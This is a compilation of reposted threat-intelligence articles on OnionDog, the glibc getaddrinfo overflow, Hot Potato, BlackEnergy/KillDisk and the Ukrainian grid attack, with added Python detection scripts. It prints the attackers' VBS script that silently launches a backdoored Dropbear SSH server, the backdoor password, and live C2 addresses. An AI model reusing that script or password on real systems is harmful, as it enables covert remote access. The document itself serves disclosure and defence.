OnionDog APT targets Critical Infrastructures and Industrial Control Systems (ICS)

The Helios Team at 360 SkyEye Labs revealed that a group named OnionDog has been infiltrating and stealing information from the energy, transportation and other infrastructure industries of Korean-language countries through the Internet.

OnionDog

OnionDog’s first activity can be traced back to October 2013, and in the following two years it was active only between late July and early September. The Trojan’s self-set life cycle is 15 days on average, and the operation is distinctly organized and objective-oriented.

OnionDog malware is delivered by exploiting a vulnerability in Hangul, an office suite popular in Korean-language countries, and it reached network-isolated targets through a USB worm.

Targeting the infrastructure industry

OnionDog concentrated its efforts on infrastructure industries in Korean-language countries. In 2015 this organization mainly attacked harbors, VTS, subways, public transportation and other transportation systems. In 2014 it attacked many electric power and water resources corporations as well as other energy enterprises.

The Helios Team has found 96 groups of malicious code and 14 C&C domain names and IP addresses related to OnionDog. It first surfaced in October 2013 and was most active in the summers of the following years. The Trojan sets its own “active state” period, measured from compilation to the end of activity: the shortest was three days and the longest twenty-nine days. The average life cycle is 15 days, which makes it harder for victim enterprises to notice and respond than with Trojans that stay active for longer periods.

OnionDog’s attacks are mainly carried out through spear-phishing emails. The early Trojan used icons and file numbers to create a fake HWP file (Hangul’s file format). Later, the Trojan exploited a vulnerability in an upgraded version of Hangul, embedding malicious code in a real HWP file. Once the file is opened, the vulnerability is triggered to download and activate the Trojan.

Since most infrastructure industries, such as the energy industry, generally adopt intranet isolation measures, OnionDog uses USB drives as a ferry to break the false sense of security that physical isolation provides. In the classic APT case of the Stuxnet virus, which broke into an Iranian nuclear power plant, the virus used an employee’s USB disk to circumvent network isolation. OnionDog also used this channel, generating USB worms to infiltrate the target’s internal network.

“OCD-type” intensive organization

OnionDog’s malicious code follows strict conventions:

First, the malicious code follows strict naming rules, beginning with the path of the PDB (symbol file) recorded at build time. For example, the path for the USB worm is APT-USB, and the path for the spear-phishing mail payload is APT-WebServer.

Second, once the OnionDog Trojan is successfully deployed, it communicates with a C&C (Trojan server), downloads other malware, saves it in the %temp% folder and consistently uses “XXX_YYY.jpg” as the file name pattern. These names have a special meaning and usually point to the target.
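The two build-and-drop conventions described above can be turned into a triage check. The following is an added example written for this page, not code from the Helios Team report: it scans raw PE bytes for the CodeView “RSDS” debug record (magic, 16-byte GUID, 4-byte age, NUL-terminated PDB path), flags paths containing the APT-USB and APT-WebServer markers the report names, and tests file names against the XXX_YYY.jpg pattern. The sample image bytes and the full PDB path are constructed; only the APT-USB fragment comes from the report.

```python
import re
import struct

# Added example; not code from the Helios Team report. It scans a PE image's
# raw bytes for CodeView "RSDS" debug records, pulls out the embedded PDB
# path, and flags the path markers the report attributes to OnionDog builds.
# It also checks the "XXX_YYY.jpg" naming pattern used for the %temp% downloads.
# The sample image bytes below are constructed for the demonstration.

RSDS_MAGIC = b"RSDS"
ONIONDOG_PDB_MARKERS = ("APT-USB", "APT-WebServer")           # named in the report
TEMP_JPG_NAME = re.compile(r"^[A-Za-z0-9]+_[A-Za-z0-9]+\.jpg$", re.IGNORECASE)


def extract_pdb_paths(data: bytes) -> list:
    """Return every PDB path found in RSDS CodeView records.

    Record layout: 'RSDS' | 16-byte GUID | 4-byte age | NUL-terminated path.
    """
    paths = []
    pos = data.find(RSDS_MAGIC)
    while pos != -1:
        path_start = pos + 4 + 16 + 4
        end = data.find(b"\x00", path_start)
        if end == -1:
            break
        raw = data[path_start:end]
        # A real PDB path is printable ASCII; skip places where "RSDS" merely
        # happens to occur inside unrelated data.
        if raw and all(0x20 <= b < 0x7F for b in raw):
            paths.append(raw.decode("ascii"))
        pos = data.find(RSDS_MAGIC, pos + 4)
    return paths


def flag_oniondog_paths(paths) -> list:
    """Return (path, marker) pairs for paths containing a known marker."""
    return [(p, m) for p in paths for m in ONIONDOG_PDB_MARKERS if m.lower() in p.lower()]


def is_oniondog_style_name(filename: str) -> bool:
    """True for a file name matching the XXX_YYY.jpg pattern (an approximation)."""
    return bool(TEMP_JPG_NAME.match(filename))


def build_rsds_record(pdb_path: str, age: int = 1) -> bytes:
    """Construct an RSDS record with a zero GUID, for the demonstration only."""
    return RSDS_MAGIC + bytes(16) + struct.pack("<I", age) + pdb_path.encode("ascii") + b"\x00"


# Constructed sample: filler bytes around one RSDS record. The path itself is
# hypothetical; only the "APT-USB" fragment comes from the report.
SAMPLE_PDB_PATH = r"D:\APT-USB\Release\worm.pdb"
SAMPLE_IMAGE = b"MZ" + bytes(62) + b"\x90" * 32 + build_rsds_record(SAMPLE_PDB_PATH) + bytes(16)

if __name__ == "__main__":
    for path, marker in flag_oniondog_paths(extract_pdb_paths(SAMPLE_IMAGE)):
        print(f"suspicious PDB path {path!r} (marker {marker})")
    print(is_oniondog_style_name("plant_ctrl.jpg"))
```

Run it against a directory of binaries by reading each file's bytes into extract_pdb_paths; a PDB path is only a pivot, so treat a marker hit as a lead for further analysis rather than a verdict on its own.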

All signs show that OnionDog is strictly organized and planned across its attack timing, targets, vulnerability research and exploitation, and malicious code. At the same time, it is very cautious about covering its tracks.

In 2014, OnionDog used many fixed IP addresses in South Korea as its C&C sites. Of course, this does not mean that the attacker is located in South Korea; these IPs could be used as puppets and jump hosts. By 2015, OnionDog’s C&C communications were upgraded to Onion City across the board, so far a relatively advanced and covert method of network communication among APT attacks.

Onion City is a deep-web search engine that uses Tor2web proxy technology to reach the anonymous Tor network without requiring the Onion Browser. OnionDog uses Onion City to hide its Trojan-controlling server inside the Tor network.

In recent years, APT attacks on infrastructure facilities and large-scale enterprises have emerged frequently. Some that attack industrial control systems, such as Stuxnet and BlackEnergy, can have devastating results. Others aim to steal information, such as the Lazarus group jointly revealed by Kaspersky, AlienVault Labs and Novetta, and OnionDog, recently exposed by the 360 Helios team. These covert cybercrimes can cause similarly serious losses.


Credit:  helpnetsecurity

[CRITICAL] CVE-2015-7547: glibc getaddrinfo stack-based buffer overflow

Have you ever been deep in the mines of debugging and suddenly realized that you were staring at something far more interesting than you were expecting? You are not alone! Recently a Google engineer noticed that their SSH client segfaulted every time they tried to connect to a specific host. That engineer filed a ticket to investigate the behavior, and after an intense investigation we discovered the issue lay in glibc and not in SSH as we were expecting. Thanks to this engineer’s keen observation, we were able to determine that the issue could result in remote code execution. We immediately began an in-depth analysis of the issue to determine whether it could be exploited, and possible fixes. We saw this as a challenge, and after some intense hacking sessions, we were able to craft a full working exploit!

In the course of our investigation, and to our surprise, we learned that the glibc maintainers had previously been alerted of the issue via their bug tracker in July, 2015. (bug). We couldn’t immediately tell whether the bug fix was underway, so we worked hard to make sure we understood the issue and then reached out to the glibc maintainers. To our delight, Florian Weimer and Carlos O’Donell of Red Hat had also been studying the bug’s impact, albeit completely independently! Due to the sensitive nature of the issue, the investigation, patch creation, and regression tests performed primarily by Florian and Carlos had continued “off-bug.”

This was an amazing coincidence, and thanks to their hard work and cooperation, we were able to translate both teams’ knowledge into a comprehensive patch and regression test to protect glibc users.

That patch is available here.


Issue Summary:

Our initial investigations showed that the issue affects all versions of glibc since 2.9. You should definitely update if you are on an older version, though. If the vulnerability is detected, machine owners may wish to take steps to mitigate the risk of an attack. The glibc DNS client-side resolver is vulnerable to a stack-based buffer overflow when the getaddrinfo() library function is used. Software using this function may be exploited with attacker-controlled domain names, attacker-controlled DNS servers, or through a man-in-the-middle attack. Google has found some mitigations that may help prevent exploitation if you are not able to immediately patch your instance of glibc. The vulnerability relies on an oversized (2048+ bytes) UDP or TCP response, which is followed by another response that will overwrite the stack. Our suggested mitigation is to limit the response sizes accepted by the local DNS resolver (e.g., via DNSMasq or similar programs), and to ensure that DNS queries are sent only to DNS servers which limit the response size for UDP responses with the truncation bit set.


Technical information:

glibc reserves 2048 bytes in the stack through alloca() for the DNS answer at _nss_dns_gethostbyname4_r() for hosting responses to a DNS query. Later on, at send_dg() and send_vc(), if the response is larger than 2048 bytes, a new buffer is allocated from the heap and all the information (buffer pointer, new buffer size and response size) is updated. Under certain conditions a mismatch between the stack buffer and the new heap allocation will happen. The final effect is that the stack buffer will be used to store the DNS response, even though the response is larger than the stack buffer and a heap buffer was allocated. This behavior leads to the stack buffer overflow. The vectors to trigger this buffer overflow are very common and can include ssh, sudo, and curl. We are confident that the exploitation vectors are diverse and widespread; we have not attempted to enumerate these vectors further.
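The mitigation from the Issue Summary (cap the response sizes a local resolver accepts, and treat truncation properly) can be expressed as a small filter in front of a stub resolver. The block below is an added example for this page, not Google’s proof of concept and not glibc code. It parses only the 12-byte DNS header (ID, flags, counts), applies a hard ceiling equal to the 2048-byte stack buffer named above, a stricter assumed UDP policy limit, and routes TC-flagged UDP answers to a TCP retry. The response messages it builds are constructed: the header is real, the body is opaque filler, so no resource records are parsed.

```python
import struct

# Added example; not Google's PoC or glibc code. Implements the local
# mitigation described in the advisory as a response filter in front of a
# stub resolver: a hard ceiling at the 2048-byte stack buffer size, a
# tighter policy limit for UDP, and "retry over TCP" for truncated answers.

STACK_ANSWER_BYTES = 2048      # stack buffer size named in the advisory
UDP_LIMIT_DEFAULT = 1024       # assumed local policy value; adjust per site
FLAG_QR = 0x8000               # header flag: message is a response
FLAG_TC = 0x0200               # header flag: response was truncated


def parse_header(resp: bytes) -> dict:
    """Decode the fixed 12-byte DNS header."""
    if len(resp) < 12:
        raise ValueError("short DNS message")
    ident, flags, qd, an, ns, ar = struct.unpack("!6H", resp[:12])
    return {
        "id": ident,
        "qr": bool(flags & FLAG_QR),
        "tc": bool(flags & FLAG_TC),
        "rcode": flags & 0x000F,
        "qdcount": qd, "ancount": an, "nscount": ns, "arcount": ar,
    }


def gate_response(resp: bytes, transport: str,
                  udp_limit: int = UDP_LIMIT_DEFAULT,
                  hard_ceiling: int = STACK_ANSWER_BYTES):
    """Return (verdict, reason); verdict is 'accept', 'drop' or 'retry_tcp'.

    The hard ceiling is deliberately coarse: it is an emergency measure for
    unpatched hosts and will reject some legitimate large TCP answers.
    """
    hdr = parse_header(resp)
    if not hdr["qr"]:
        return "drop", "QR bit clear: not a response"
    if len(resp) > hard_ceiling:
        return "drop", f"{len(resp)} bytes exceeds hard ceiling {hard_ceiling}"
    if transport == "udp":
        if len(resp) > udp_limit:
            return "drop", f"udp response of {len(resp)} bytes exceeds policy limit {udp_limit}"
        if hdr["tc"]:
            return "retry_tcp", "truncated by server; re-query over tcp"
    return "accept", "ok"


def build_response(ident: int, body_len: int, tc: bool = False) -> bytes:
    """Construct a response-shaped message: real header, opaque body filler."""
    flags = FLAG_QR | (FLAG_TC if tc else 0)
    header = struct.pack("!6H", ident, flags, 1, 1, 0, 0)
    return header + b"\x00" * body_len


if __name__ == "__main__":
    for label, msg, transport in [
        ("small udp", build_response(7, 40), "udp"),
        ("oversized udp", build_response(7, 1500), "udp"),
        ("same size over tcp", build_response(7, 1500), "tcp"),
        ("above stack buffer, tcp", build_response(7, 2100), "tcp"),
        ("truncated udp", build_response(7, 40, tc=True), "udp"),
    ]:
        print(f"{label:24s} -> {gate_response(msg, transport)}")
```

The gate is a stopgap, not a replacement for patching: once glibc is updated, drop the hard ceiling so large DNSSEC answers over TCP are accepted again.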

Exploitation:

Remote code execution is possible, but not straightforward. It requires bypassing the security mitigations present on the system, such as ASLR. We will not release our exploit code, but a non-weaponized Proof of Concept has been made available simultaneously with this blog post. With this Proof of Concept, you can verify whether you are affected by this issue, and verify any mitigations you may wish to enact. As you can see in the debugging session below, we are able to reliably control EIP/RIP.

(gdb) x/i $rip
=> 0x7fe156f0ccce <_nss_dns_gethostbyname4_r+398>: req
(gdb) x/a $rsp
0x7fff56fd8a48: 0x4242424242424242 0x4242424242420042

When code crashes unexpectedly, it can be a sign of something much more significant than it appears; ignore crashes at your peril! Failed exploit indicators, due to ASLR, can range from:

  • Crash on free(ptr) where ptr is controlled by the attacker.
  • Crash on free(ptr) where ptr is semi-controlled by the attacker since ptr has to be a valid readable address.
  • Crash reading from memory pointed by a local overwritten variable.
  • Crash writing to memory on an attacker-controlled pointer.

We would like to thank Neel Mehta, Thomas Garnier, Gynvael Coldwind, Michael Schaller, Tom Payne, Michael Haro, Damian Menscher, Matt Brown, Yunhong Gu, Florian Weimer, Carlos O’Donell and the rest of the glibc team for their help figuring out all details about this bug, exploitation, and patch development.


Credit:  Fermin J. Serna and Kevin Stadmeyer

Another Door to Windows | Hot Potato exploit

Microsoft Windows versions 7, 8, 10, Server 2008 and Server 2012 are vulnerable to the Hot Potato exploit, which gives hackers total control of the PC/laptop

Security researchers from Foxglove Security have discovered that almost all recent versions of Microsoft’s Windows operating system are vulnerable to a privilege escalation exploit. By chaining together a series of known Windows security flaws, the researchers found a way to break into PCs, systems and laptops running Windows 7/8/8.1/10 and Windows Server 2008/2010.

The Foxglove researchers named the exploit Hot Potato. It relies on three different attacks, some of which were discovered back at the start of the new millennium, in 2000. By chaining them together, hackers can remotely gain complete access to PCs and laptops running the above versions of Windows.

Surprisingly, some of the exploits were found way back in 2000 but have still not been patched by Microsoft, with the explanation that by patching them, the company would effectively break compatibility between the different versions of their operating system.

Hot Potato

Hot Potato combines three different security issues in the Windows operating system: a local NBNS (NetBIOS Name Service) spoofing technique that is 100% effective, the use of that spoofing to set up a fake WPAD (Web Proxy Auto-Discovery Protocol) proxy server, and an attack against the Windows NTLM (NT LAN Manager) authentication protocol.

Chaining these issues allows an attacker to gain control of the PC/laptop by elevating an application’s permissions from the lowest level to system-level privileges, the Windows analogue of a Linux/Android root user’s permissions.

Foxglove researchers created their exploit on top of a proof-of-concept code released by Google’s Project Zero team in 2014 and have presented their findings at the ShmooCon security conference over the past weekend.

They have also posted proof-of-concept videos on YouTube in which the researchers break Windows versions such as 7, 8, 10, Server 2008 and Server 2012.

You can also access the proof of concept on Foxglove’s GitHub page here.

Mitigation

The researchers said that using SMB (Server Message Block) signing may theoretically block the attack. Another method to stop the NTLM relay attack is to enable “Extended Protection for Authentication” in Windows.


Credit:  Vijay Prabhu, techworm

BlackEnergy Attacking Ukraine’s Critical Infrastructures

The cybercriminal group behind BlackEnergy, the malware family that has been around since 2007 and made a comeback in 2014 (see our previous blog posts on Back in BlackEnergy *: 2014 Targeted Attacks in Ukraine and Poland and BlackEnergy PowerPoint Campaigns, as well as our Virus Bulletin talk on the subject), was also active in 2015.

ESET has recently discovered that the BlackEnergy trojan was used as a backdoor to deliver a destructive KillDisk component in attacks against Ukrainian news media companies and against the electrical power industry. In this blog, we provide details on the BlackEnergy samples ESET detected in 2015, as well as the KillDisk components used in the attacks. Furthermore, we examine a previously unknown SSH backdoor that was also used as another channel for accessing the infected systems, in addition to BlackEnergy.

BlackEnergy evolution in 2015

Once activated, variants of BlackEnergy Lite allow a malware operator to check specific criteria in order to assess whether the infected computer truly belongs to the intended target. If that is the case, the dropper of a regular BlackEnergy variant is pushed to the system.

The BlackEnergy malware stores XML configuration data embedded in the binary of the DLL payload.

Figure 1 – The BlackEnergy configuration example used in 2015

Apart from a list of C&C servers, the BlackEnergy config contains a value called build_id. This value is a unique text string used to identify individual infections or infection attempts by the BlackEnergy malware operators. The combinations of letters and numbers used can sometimes reveal information about the campaign and targets.

Here is the list of Build ID values that we identified in 2015:

  • 2015en
  • khm10
  • khelm
  • 2015telsmi
  • 2015ts
  • 2015stb
  • kiev_o
  • brd2015
  • 11131526kbp
  • 02260517ee
  • 03150618aaa
  • 11131526trk

We can speculate that some of them have a special meaning. For example 2015telsmi could contain the Russian acronym SMI – Sredstva Massovoj Informacii, 2015en could mean Energy, and there’s also the obvious “Kiev”.

KillDisk component

In 2014 some variants of the BlackEnergy trojan contained a plugin designed for the destruction of the infected system, named dstr.

In 2015 the BlackEnergy group started to use a new destructive BlackEnergy component detected by ESET products as Win32/KillDisk.NBB, Win32/KillDisk.NBC and Win32/KillDisk.NBD trojan variants.

The main purpose of this component is to do damage to data stored on the computer: it overwrites documents with random data and makes the OS unbootable.

The first known case where the KillDisk component of BlackEnergy was used was documented by CERT-UA in November 2015. In that instance, a number of news media companies were attacked at the time of the 2015 Ukrainian local elections. The report claims that a large number of video materials and various documents were destroyed as a result of the attack.

It should be noted that the Win32/KillDisk.NBB variant used against media companies is more focused on destroying various types of files and documents. It has a long list of file extensions that it tries to overwrite and delete. The complete list contains more than 4000 file extensions.


Figure 2 – A partial list of file extensions targeted for destruction by KillDisk.NBB

The KillDisk component used in attacks against energy companies in Ukraine was slightly different. Our analysis of the samples shows that the main changes made in the newest version are:

  • Now it accepts a command line argument, to set a specific time delay when the destructive payload should activate.
  • It also deletes Windows Event Logs: Application, Security, Setup, System.
  • It is less focused on deleting documents. Only 35 file extensions are targeted.

Figure 3 – A list of file extensions targeted for destruction by new variant of KillDisk component

As well as being able to delete system files to make the system unbootable – functionality typical for such destructive trojans – the KillDisk variant detected in the electricity distribution companies also appears to contain some additional functionality specifically intended to sabotage industrial systems.

Once activated, this variant of the KillDisk component looks for and terminates two non-standard processes with the following names:

  • komut.exe
  • sec_service.exe

We didn’t manage to find any information regarding the name of the first process (komut.exe).

The second process name may belong to software called ASEM Ubiquity, a software platform that is often used in Industrial control systems (ICS), or to ELTIMA Serial to Ethernet Connector. In case the process is found, the malware does not just terminate it, but also overwrites the executable file with random data.

Backdoored SSH server

In addition to the malware families already mentioned, we have discovered an interesting sample used by the BlackEnergy group. During our investigation of one of the compromised servers we found an application that, at first glance, appeared to be a legitimate SSH server called Dropbear SSH.

In order to run the SSH server, the attackers created a VBS file with the following content:

Set WshShell = CreateObject("WScript.Shell")
WshShell.CurrentDirectory = "C:\WINDOWS\TEMP\Dropbear\"
WshShell.Run "dropbear.exe -r rsa -d dss -a -p 6789", 0, false

As is evident here, the SSH server will accept connections on port number 6789. By running SSH on the server in a compromised network, attackers can come back to the network whenever they want.

However, for some reason this was not enough for them. After detailed analysis we discovered that the binary of the SSH server actually contains a backdoor.

Figure 4 – Backdoored authentication function in SSH server

As you can see in Figure 4, this version of Dropbear SSH will authenticate the user if the password passDs5Bu9Te7 is entered. The same applies to authentication by key pair: the server contains a pre-defined constant public key and allows authentication only if the matching private key is used.

Figure 5 – The embedded RSA public key in SSH server

ESET security solutions detect this threat as Win32/SSHBearDoor.A trojan.

Indicators of Compromise (IoC)

IP addresses of BlackEnergy C2 servers:
5.149.254.114
5.9.32.230
31.210.111.154
88.198.25.92
146.0.74.7
188.40.8.72

XLS document with malicious macro SHA-1:
AA67CA4FB712374F5301D1D2BAB0AC66107A4DF1

BlackEnergy Lite dropper SHA-1:
4C424D5C8CFEDF8D2164B9F833F7C631F94C5A4C

BlackEnergy Big dropper SHA-1:
896FCACFF6310BBE5335677E99E4C3D370F73D96

BlackEnergy drivers SHA-1:
069163E1FB606C6178E23066E0AC7B7F0E18506B
0B4BE96ADA3B54453BD37130087618EA90168D72
1A716BF5532C13FA0DC407D00ACDC4A457FA87CD
1A86F7EF10849DA7D36CA27D0C9B1D686768E177
1CBE4E22B034EE8EA8567E3F8EB9426B30D4AFFE
20901CC767055F29CA3B676550164A66F85E2A42
2C1260FD5CEAEF3B5CB11D702EDC4CDD1610C2ED
2D805BCA41AA0EB1FC7EC3BD944EFD7DBA686AE1
4BC2BBD1809C8B66EECD7C28AC319B948577DE7B
502BD7662A553397BBDCFA27B585D740A20C49FC
672F5F332A6303080D807200A7F258C8155C54AF
84248BC0AC1F2F42A41CFFFA70B21B347DDC70E9
A427B264C1BD2712D1178912753BAC051A7A2F6C
A9ACA6F541555619159640D3EBC570CDCDCE0A0D
B05E577E002C510E7AB11B996A1CD8FE8FDADA0C
BD87CF5B66E36506F1D6774FD40C2C92A196E278
BE319672A87D0DD1F055AD1221B6FFD8C226A6E2
C7E919622D6D8EA2491ED392A0F8457E4483EAE9
CD07036416B3A344A34F4571CE6A1DF3CBB5783F
D91E6BB091551E773B3933BE5985F91711D6AC3B
E1C2B28E6A35AEADB508C60A9D09AB7B1041AFB8
E40F0D402FDCBA6DD7467C1366D040B02A44628C
E5A2204F085C07250DA07D71CB4E48769328D7DC

KillDisk components SHA-1:
16F44FAC7E8BC94ECCD7AD9692E6665EF540EEC4
8AD6F88C5813C2B4CD7ABAB1D6C056D95D6AC569
6D6BA221DA5B1AE1E910BBEAA07BD44AFF26A7C0
F3E41EB94C4D72A98CD743BBB02D248F510AD925

VBS/Agent.AD trojan SHA-1:
72D0B326410E1D0705281FDE83CB7C33C67BC8CA

Win32/SSHBearDoor.A trojan SHA-1:
166D71C63D0EB609C4F77499112965DB7D9A51BB
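The indicators above cover three artefact types: file hashes, C2 addresses and the Dropbear launch line from the VBS dropper. The following is an added example for this page, not ESET’s code, that checks all three: it hashes file contents with SHA-1 against a subset of the list above (extend the set with the remaining hashes), matches IPv4 addresses in log lines against the C2 set, and matches process command lines against the dropbear.exe invocation on port 6789. The log lines and command lines are constructed samples; the hash and IP values are copied from the IoC list.

```python
import hashlib
import os
import re

# Added example; not ESET's code. Matches three artefact types from the
# write-up: SHA-1 file hashes, C2 IP addresses, and the Dropbear launch line
# from the VBS dropper. Sample logs and command lines are constructed.

BLACKENERGY_C2_IPS = {
    "5.149.254.114", "5.9.32.230", "31.210.111.154",
    "88.198.25.92", "146.0.74.7", "188.40.8.72",
}

# SHA-1 values from the IoC list (subset; add the remaining entries as needed).
BLACKENERGY_SHA1 = {
    "AA67CA4FB712374F5301D1D2BAB0AC66107A4DF1",  # XLS with malicious macro
    "4C424D5C8CFEDF8D2164B9F833F7C631F94C5A4C",  # BlackEnergy Lite dropper
    "896FCACFF6310BBE5335677E99E4C3D370F73D96",  # BlackEnergy Big dropper
    "16F44FAC7E8BC94ECCD7AD9692E6665EF540EEC4",  # KillDisk component
    "72D0B326410E1D0705281FDE83CB7C33C67BC8CA",  # VBS/Agent.AD
    "166D71C63D0EB609C4F77499112965DB7D9A51BB",  # Win32/SSHBearDoor.A
}

# The backdoored Dropbear start line from the VBS dropper: dropbear.exe ... -p 6789
DROPBEAR_LAUNCH = re.compile(r"dropbear\.exe\b.*\s-p\s+6789\b", re.IGNORECASE)
IPV4 = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")


def sha1_of_bytes(data: bytes) -> str:
    return hashlib.sha1(data).hexdigest().upper()


def match_hashes(files: dict) -> list:
    """files maps a label to file content; returns (label, sha1) for IoC hits."""
    hits = []
    for name, content in files.items():
        digest = sha1_of_bytes(content)
        if digest in BLACKENERGY_SHA1:
            hits.append((name, digest))
    return hits


def match_c2_ips(lines) -> list:
    """Return (line_number, ip) for every known C2 address seen in the lines."""
    hits = []
    for number, line in enumerate(lines, 1):
        for ip in IPV4.findall(line):
            if ip in BLACKENERGY_C2_IPS:
                hits.append((number, ip))
    return hits


def match_dropbear_launch(cmdlines) -> list:
    """Return the command lines that look like the backdoored Dropbear start."""
    return [c for c in cmdlines if DROPBEAR_LAUNCH.search(c)]


def scan_directory(root: str) -> list:
    """Hash every regular file under root and report IoC matches."""
    hits = []
    for dirpath, _, names in os.walk(root):
        for name in names:
            full = os.path.join(dirpath, name)
            try:
                with open(full, "rb") as fh:
                    digest = sha1_of_bytes(fh.read())
            except OSError:
                continue
            if digest in BLACKENERGY_SHA1:
                hits.append((full, digest))
    return hits


# Constructed samples (203.0.113.0/24 is documentation address space).
SAMPLE_LOG = [
    "2015-12-20 10:01:02 fw allow 10.0.0.5:51234 -> 203.0.113.10:443",
    "2015-12-20 10:01:09 fw allow 10.0.0.5:51240 -> 5.149.254.114:80",
    "2015-12-20 10:02:11 fw allow 10.0.0.7:49152 -> 10.0.0.1:53",
    "2015-12-20 10:03:30 fw allow 10.0.0.5:51261 -> 188.40.8.72:443",
]
SAMPLE_CMDLINES = [
    r"C:\Windows\System32\svchost.exe -k netsvcs",
    r"C:\WINDOWS\TEMP\Dropbear\dropbear.exe -r rsa -d dss -a -p 6789",
    r"C:\Program Files\PuTTY\plink.exe -P 22 host",
]

if __name__ == "__main__":
    print("C2 contacts:", match_c2_ips(SAMPLE_LOG))
    print("Dropbear launches:", match_dropbear_launch(SAMPLE_CMDLINES))
    print("hash hits:", match_hashes({"sample.bin": b"placeholder content"}))
```

Hash matching only catches the exact samples listed, so pair it with the C2 and command-line checks, which survive recompilation of the payloads.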

Credit: welivesecurity

Malware Found Inside Downed Ukrainian Grid Management Points to Cyber-attack

The Burshtyn TES power plant in Ivano-Frankivsk Oblast, Ukraine. It’s not clear if Burshtyn was affected, but power outages did affect the grid in the Ivano-Frankivsk Oblast region. Image: Raimond Spekking/Wikimedia Commons

Overview

On December 23, a Ukrainian power company announced that a section of the country had gone dark. This temporary outage was not the result of purely physical sabotage—like the case a month earlier where explosives had knocked out power lines to Crimea—but instead, according to Ukrainian officials, was due to a cyberattack.

The country’s SBU security service immediately castigated Russia for the outage, according to Reuters, and Ukraine started an official investigation into what exactly happened.

Over the past few days, more details around the attack have emerged, including an apparent sample of malware found in a network of the regional control center. If that malware was indeed responsible for causing a blackout throughout parts of Ukraine, it would be a signal that industrial control systems (ICS), and in particular electric grids, really are under threat from cyberattacks, something that researchers have been warning for years.

“It was easily recoverable, but obviously it’s a bad thing for the power to go out”

Around a week after the attack announcement, Robert M. Lee, a former US Air Force cyber warfare operations officer as well as the founder and CEO of Dragos Security, wrote on the SANS ICS Security Blog that his team had obtained a sample of the malware found within the affected network.

“The fact that malware was recovered from the network at all, and the fact that it’s newer, gives a high confidence assessment that the cyberattack on Ukraine was legitimate,” Lee told Motherboard in a phone interview. Lee said the malware was “unique,” implying that it likely wasn’t something that just happened to be on the grid network during the outage.

“The malware is a 32 bit Windows executable and is modular in nature indicating that this is a module of a more complex piece of malware,” Lee wrote in his blog post. Lee passed the sample to Kyle Wilhoit, a senior threat researcher at cybersecurity company Trend Micro, who said that the malware had a wiping function that would impact the targeted system.

“The resolution of APIs that are not used elsewhere in the code probably means that some of the code was borrowed from another program,” wrote Jake Williams, founder of Rendition Security and a SANS instructor, to whom Lee also provided the malware. Williams added that the malware appears to have a code “base,” on which modules are then added.

Other pieces of malware have targeted industrial systems in the past: “Havex” has infected technology commonly used in process control systems, such as water pumps and turbines; and “BlackEnergy,” which has been used in straight-up cybercriminal campaigns, has also been used to hit energy engineering facilities.

An Associated Press investigation published in December last year found that “sophisticated foreign hackers” had gained enough access to control power plant networks around a dozen times in the last decade. More broadly, the Wall Street Journal recently revealed that Iranian hackers had breached a New York dam in 2013. At the latest Chaos Communication Congress, a security, politics and art conference in Hamburg, Germany, researchers warned of the serious vulnerabilities in automated railroad systems. All of those require varying degrees of sophistication, with some of them needing expert knowledge of the target network’s protocols and idiosyncrasies.

After Lee’s post, more researchers published their own findings. Analysts from ESET claimed that the malware found in Ukraine was actually the BlackEnergy malware. Others went a step further and wrote that BlackEnergy had been found within other Ukrainian power companies during the week of Christmas last year.

One group that has made heavy use of the BlackEnergy malware, and has previously targeted power facilities and other ICS, is the alleged Russian hacking group Sandworm. It would be easy to assume that, because of the target and the presence of supposed BlackEnergy malware, Sandworm was behind the attack.

But that’s a logical leap too far, at least with the currently available evidence.

“The BlackEnergy malware has been in existence since 2007 and lots of different actors have used it,” Lee told Motherboard.

“People are saying that this piece of malware is linked to BlackEnergy. I can buy that, and there is some good analysis to say that is likely true,” he added. “But just because the BlackEnergy malware was used, does not mean that it’s linked at all” to Sandworm.

Irrespective of who committed the attack, what appears to have happened is that hackers “caused a power outage that was temporary in nature. It was easily recoverable, but obviously it’s a bad thing for the power to go out,” Lee said. “It’s not trivial—it still takes getting on the system and exploiting all that—but it’s not hard.”

One possible explanation is that the attackers may have remotely accessed a digital control panel located within the control center’s system. Other researchers have pointed towards the data wiping feature of the malware; presumably, wiping out vital data could have a negative impact on the electric grid’s systems. At this point, both of those theories are largely speculative.

But while either of those approaches is relatively easy for a hacker to carry out, attacks that would cause much more impact—lasting for, say, weeks or months—are much less likely to occur.

“Taking down the power grid, or cascading failures, or weeks of impact: that is incredibly hard. People have oversold how easy that is to achieve,” Lee added.

Although experts say it is likely that the power outage in Ukraine was caused by a cyberattack, there are still plenty of questions to be answered. More news is sure to follow in the coming days or weeks, as several research teams now have access to the malware sample.

Correction 1/4/16: This story originally referred to systems being compromised in a power plant or plants on the affected grid. As Michael Toecker pointed out, local sources report it was a regional control center that was affected.


Malware Analysis

The SANS ICS team recently gained access to a sample of malware that came from the network of the Ukrainian site targeted in the cyber attack that led to a power outage. I want to offer a few caveats to this blog post up front.


  • First, this is all developing and the next few days and weeks will add clarity to the situation.
  • Second, with this type of analysis there’s not much that can be definitively stated in terms of attribution or impact. Take everything here as informative only.
  • Third, SANS ICS is not in the business of releasing highly detailed technical analysis of malware. The purpose of this blog is to focus on lessons learned and education for the community. Therefore, I am not going to be sharing the hash of the sample we have but instead talking about the takeaways. There are at least 3 major cybersecurity and threat intelligence vendors I am aware of that have the sample and will be releasing detailed analyses. I do not want us at SANS ICS to impede that by releasing the sample to the wider community right now. However, to any of the major players and researchers that want a sample feel free to reach out to us via the SANS ICS Alumni email distribution and we will provide it to verified sources.

Here I’ll detail the facts, speculation, and takeaways for the community.

The Facts

The SANS ICS team has been researching the cyber attack on the Ukrainian power grid since the event occurred with a mix of interest and a critical viewpoint. The interest was due to the seriousness of the event and the critical viewpoint was taken because while threats are active against ICS there are often otherwise good case-studies that get spun out of control by the media. The idea of a cyber attack on infrastructure that leads to an impact to operations is very serious in nature and must be handled with care, especially when there is geopolitical tension in an area such as Ukraine.

Through trusted contacts in the community, the SANS ICS team came across a lot of amplifying information about the attack, how it could have occurred, and the seriousness of this incident to the Ukrainian government, and the focus they are putting on the investigation increases the credibility of their reporting. The SANS ICS team was also passed a sample of malware from trusted sources, taken from the impacted network by responders in country.

The hash for the malware can also be found on VirusTotal where a user in Ukraine submitted the sample on the 23rd of December. The timing and unique nature of the sample adds some credibility to the sources that collected and passed us the sample of the malware.

